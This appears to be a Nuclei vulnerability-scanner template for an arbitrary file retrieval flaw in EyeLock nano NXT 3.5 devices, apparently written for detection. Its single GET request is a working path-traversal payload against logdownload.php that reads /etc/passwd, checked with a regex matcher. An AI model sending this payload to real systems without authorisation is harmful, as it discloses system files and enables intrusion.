id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
  author: geeknik
  severity: high
  description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
  reference:
    - https://www.zeroscience.mk/codes/eyelock_lfd.txt
  metadata:
    max-request: 1
  tags: iot,lfi,eyelock

http:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

# digest: 4a0a00473045022032e52a55ea074d1260dcdd3cd9cca43408e1a518dfec633df2d5865351fd27a40221009f4d1d65699d6288cd8a54a263927849b4e093b88e3d61bb69fb0da42495cbc6:922c64590222798bb761d5b6d8e72950